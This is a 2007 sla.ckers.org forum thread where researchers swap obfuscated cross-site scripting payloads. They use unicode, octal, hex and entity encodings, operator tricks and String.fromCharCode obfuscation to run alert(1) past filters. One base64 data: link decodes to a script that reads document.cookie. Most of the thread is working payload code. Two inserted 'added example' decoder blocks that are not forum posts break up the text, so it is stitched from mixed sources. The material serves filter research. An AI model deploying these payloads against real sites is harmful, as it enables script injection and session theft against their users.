Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 09, 2007 07:57AM

Hehe you been hacking my blog :) ?

I'll check to see what's happened, what are the symptoms?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: December 10, 2007 04:37AM

Nope, I never hack any friend's site, that's the truth.

I did notice that some post did not come through; it was the htmlentities post, where I was talking about how htmlentities works in the PHP source. But obviously it was gone and I was too lazy to type it again.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 11, 2007 06:03PM

For truly unreadable Javascript combine octal and unicode :D

\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029

which translates to FF only:-
1+1['eval']('alert(1)')

Here's the Hackvertor vector for creating it:-
<@uni>1<@/uni> + <@uni>1<@/uni><@uni>[<@/uni>'<@oct>eval<@/oct><@oct><@/oct>'<@uni>]<@/uni><@uni>(<@/uni>'<@oct>alert(1)<@/oct>'<@uni>)<@/uni>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 11, 2007 07:00PM

Here's another one with even more code obscured including operators:-
\u0030\u005b\u0022\x65\x76\x61\x6C"\u005d\u0028\u0027\x61\x6C\x65\x72\x74\x28\x31\x29'\u0029

Hackvertor translation:-
<@uni>0<@/uni><@uni>["<@/uni><@hex>eval<@/hex>"<@uni>]<@/uni><@uni>(<@/uni><@uni>'<@/uni><@hex>alert(1)<@/hex>'<@uni>)<@/uni>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 12, 2007 05:48AM

PDP posted an awesome vector on my blog:-
0..eval('alert(1)')

I'm not sure why the double dot works, does anyone have any links?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 12, 2007 07:55AM

It's ok I found out what it does :) check this out:-

0/eval('alert(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 12, 2007 08:11AM

0/alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: rsnake
Date: December 13, 2007 08:27AM

odd!

- RSnake
Gotta love it. http://ha.ckers.org

Re: New XSS vectors
Posted by: Spyware
Date: December 13, 2007 09:21AM

alert(1)/alert(2) works too. Two commands for the price of one!

EDIT

Also, is this normal behavior?

alert(1)[alert(2)]



Edited 1 time(s). Last edit at 12/13/2007 09:25AM by Spyware.

Re: New XSS vectors
Posted by: Anonymous User
Date: December 13, 2007 11:02AM

Long time no haiku - had some work with the PHPIDS to do :)


emphasis
might find its way
or close all doors

{{{!!!1}}!alert\u000B(!!1)}

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 13, 2007 04:29PM

--alert(1)
-alert(1)
+-alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: December 13, 2007 05:39PM

What have I done ;)



no matter how
many zeros you add
results never vary

;;;000,000;;;with(000);;;alert(000);;;

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 14, 2007 03:47AM

Chained ternary operators are cool!

0?1:!1?0:0?1:1/alert(1)?1:1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 14, 2007 03:49AM

Crazy but executes:-
+-0?+-1:!1?+-0:+-0?+-1:+-1/alert(1)?+-1:+-1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 14, 2007 03:59AM

Here's why I think Javascript allows these invalid vectors.

It can't raise an error first without running the function code, so the parser has to perform the function to check the returned amount. Only when the process is complete does javascript raise an error.

These for example don't raise errors:-
function x() {
alert(1);
return 1;
}
1;1/x();+-x();~x()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/14/2007 04:02AM by Gareth Heyes.

Re: New XSS vectors
Posted by: Anonymous User
Date: December 14, 2007 04:10AM

Yep - at least spidermonkey must act that way. I noticed in several vectors that an alert was executed and after the execution the parser told me that alert wasn't defined. Weird.

<edit>
Ah and btw - someday I'd just like to have a look inside the parser sources to check how the hell it differentiates between comparison operators, bit operators and xml predicates...



(1<<1>>alert(2)<<1>>1)
(1<1>alert(false)<1>1)
alert(<a>alert(false)</a>)



</edit>



Edited 1 time(s). Last edit at 12/14/2007 04:34AM by .mario.

Re: New XSS vectors
Posted by: Spyware
Date: December 14, 2007 05:33AM

alert(1)-alert(/two/)
[-alert(1)]
[~alert(1)] --> writes -1 instead of NaN.
-Math.abs[(+alert(/boo/))]

Dunno if any of this stuff is new, what's the best way for checking whether it's new or not?



Edited 5 time(s). Last edit at 12/14/2007 05:42AM by Spyware.

Re: New XSS vectors
Posted by: Anonymous User
Date: December 14, 2007 11:04AM

The last for a couple of days...



breathe in
breathe out and rest
to solve the problem


{}(_=/./.eval,!0,0);!_(['ale'+'rt(!0)'][0])[0]

Re: New XSS vectors
Posted by: Spyware
Date: December 15, 2007 06:15PM

This new?

javascript:/I am:/+alert(/1234/)

Re: New XSS vectors
Posted by: DoctorDan
Date: December 16, 2007 12:01AM

Mostly just cause they look cool:

x={}
x[/\\/]=!/\\/?/\\/:alert
x[/\\/].valueOf()(1)


and a variation...

x=[]
x[{}]=!/\\/?[]:alert
x[{}].valueOf()(1)


-Dan

Re: New XSS vectors
Posted by: DoctorDan
Date: December 16, 2007 12:39AM

x=[]
x[{}]=!/\\/?{}:eval
x[/\\/]=(/:/)[-0]?{}:(/al/)[-1]
x[/\\/]+=!/\\/?{}:(/ert/)[-1]
x[{}].valueOf()(x[/\\/]+(/(1)/)[-1])


Check this! You can define strings quotelessly as so, (/string/)[-1]. Notice that the foreslashes don't turn up in the string! It was heavily inspired by Gareth's post on the previous page talking about making strings one character at a time using square brackets. And a new way to get false... (/anything/)[-2], which could be helpful for the ternary operator.

EDIT: you can even lose the parentheses. /string/[-1] will do. Single and double quotes can go between the slashes.

-Dan



Edited 1 time(s). Last edit at 12/16/2007 07:38PM by DoctorDan.

Re: New XSS vectors
Posted by: guesty22
Date: December 17, 2007 05:45PM

Hi,

I saw on a cheatsheet many variations of data:text and a href. But not this one.

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==">Test</a>


it works under FF: 2.0.0.10, doesn't: Opera 9.24, IE 6.0, 7.0
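The data: link above hides its content behind base64; an added example (not the poster's code) that parses such an href and reports the decoded media type and body, so a filter or reviewer can judge the link by what it actually carries. The sample href is the one from the post; parseDataUrl and describeHref are names chosen here.

```javascript
// Added example: decode a data: URL taken from an href for inspection.
// Assumes Node.js (Buffer) for the base64 step.

// Split "data:[<mediatype>][;base64],<data>" into its parts and decode the
// body. Per RFC 2397 an empty media type defaults to text/plain.
function parseDataUrl(url) {
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(url.trim());
  if (!m) return null;
  const params = m[1].split(';');
  const mediaType = (params.shift() || 'text/plain').toLowerCase();
  const isBase64 = params.some((p) => p.toLowerCase() === 'base64');
  const body = isBase64
    ? Buffer.from(m[2], 'base64').toString('utf8')
    : decodeURIComponent(m[2]);
  return { mediaType, isBase64, body };
}

// Report whether the href is a data: URL and whether its decoded content is
// a document the browser would render with scripting (text/html, or a body
// that carries a <script> tag). Whether the script then runs depends on the
// browser, as the post notes: Firefox 2.0.0.10 yes, Opera 9.24 and IE 6/7 no.
function describeHref(href) {
  const d = parseDataUrl(href);
  if (!d) return { dataUrl: false };
  const activeContent = d.mediaType === 'text/html' || /<script\b/i.test(d.body);
  return { dataUrl: true, mediaType: d.mediaType, activeContent, body: d.body };
}

// The href from the post above (constructed sample for this example).
const sampleHref =
  'data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==';
console.log(describeHref(sampleHref));
```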

Re: New XSS vectors
Posted by: Anonymous User
Date: December 18, 2007 04:04PM

@guesty22: https://h4k.in/dataurl

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 18, 2007 07:01PM

<frameset/&apos;/onload=+1?0+&#x5C&#x75&#x30&#x30&#x36&#x31&#x5C&#x75&#x30&#x30&#x36&#x63&#x5C&#x75&#x30&#x30&#x36&#x35&#x5C&#x75&#x30&#x30&#x37&#x32&#x5C&#x75&#x30&#x30&#x37&#x34&#x5C&#x75&#x30&#x30&#x32&#x38&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x32&#x39+1:1?0:1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
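Gareth's octal/unicode, hex/unicode and entity-wrapped vectors earlier in this page all layer escapes over ordinary JavaScript; as an added example (not code from the thread or from Hackvertor), a normalizer that peels those layers so a reviewer or detection rule sees the underlying source. Function names and the sample strings are constructed here, copied from the vectors above.

```javascript
// Added example (not the thread's own code): peel the encoding layers the
// vectors above stack on top of plain JavaScript, so a reviewer or a
// detection rule sees the underlying source. Handles \uXXXX, \xXX and
// octal \NNN escapes, optionally wrapped in HTML numeric character
// references (with or without ';', as in the frameset vector).

// Decode HTML numeric references such as &#x5C or &#92; the ';' is optional
// because HTML parsers accept either form inside attribute values.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) =>
    String.fromCodePoint(num[0].toLowerCase() === 'x'
      ? parseInt(num.slice(1), 16)
      : parseInt(num, 10)));
}

// Decode JavaScript escapes: \uXXXX (unicode), \xXX (hex), \NNN (octal).
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-f]{4})|\\x([0-9a-f]{2})|\\([0-7]{1,3})/gi,
    (_, u, x, o) => String.fromCharCode(
      u !== undefined ? parseInt(u, 16)
        : x !== undefined ? parseInt(x, 16)
          : parseInt(o, 8)));
}

// Apply the layers in the order a browser does: the HTML parser decodes
// entities in the attribute value, then the JS engine decodes escapes.
function normalize(s) {
  return decodeJsEscapes(decodeNumericEntities(s));
}

// Constructed samples copied from the vectors in this thread; backslashes
// are doubled so each string holds the escape text, not the decoded char.
const samples = {
  octalAndUnicode:
    "\\u0031+\\u0031\\u005b'\\145\\166\\141\\154'\\u005d\\u0028'\\141\\154\\145\\162\\164\\50\\61\\51'\\u0029",
  hexAndUnicode:
    "\\u0030\\u005b\\u0022\\x65\\x76\\x61\\x6C\"\\u005d\\u0028\\u0027\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29'\\u0029",
  entitiesOverUnicode:
    "&#x5C&#x75&#x30&#x30&#x36&#x31&#x5C&#x75&#x30&#x30&#x36&#x63&#x5C&#x75&#x30&#x30&#x36&#x35" +
    "&#x5C&#x75&#x30&#x30&#x37&#x32&#x5C&#x75&#x30&#x30&#x37&#x34&#x5C&#x75&#x30&#x30&#x32&#x38" +
    "&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x32&#x39",
};

for (const [name, src] of Object.entries(samples)) {
  console.log(name + ' -> ' + normalize(src));
}
```

The same decodeJsEscapes step also turns the \u9999-style identifiers in the later post back into the characters the engine actually sees.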

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 19, 2007 06:08AM

<image
@/src=//businessinfo.co.uk/images/logo.gif
@/onload
=
\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 19, 2007 10:29AM

\u9999=alert
\u9999(1)

\u9998=alert
\u9998(1)

\u9997=alert
\u9997(1)

and so on...
Range seems to be from \u5000 to \u9999 and is allowed as a valid Javascript variable

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/20/2007 03:29AM by Gareth Heyes.

Re: New XSS vectors
Posted by: DoctorDan
Date: December 19, 2007 07:02PM

That's pretty cool Gareth.

Okay, this one is a bit long and perhaps impractical, but cool nonetheless.
x={}
m=Math
s=String
x[/\\/]=!/\\/?{}:eval
x[{}]=s()
for (i=1;i<6;i++) { x[{}]+=s.fromCharCode((-23/8)*m.pow(i,4)+(421/12)*m.pow(i,3)+(-1181/8)*m.pow(i,2)+(3017/12)*i-39) }
x[/\\/].valueOf()(x[{}]+/(1)/[-1])


Behold the for loop!
-Dan



Edited 1 time(s). Last edit at 12/19/2007 07:03PM by DoctorDan.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 03:28AM

@dan

Nice! I like the string trick [-1] mentioned earlier too :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Anonymous User
Date: December 20, 2007 04:13AM

@Dan: Nice one! String.fromCharCode is just perfect for obfuscation combined with the Math object...

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 04:16AM

\u50001 \u0073\u0065\u0074ter=alert
\u50001=1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
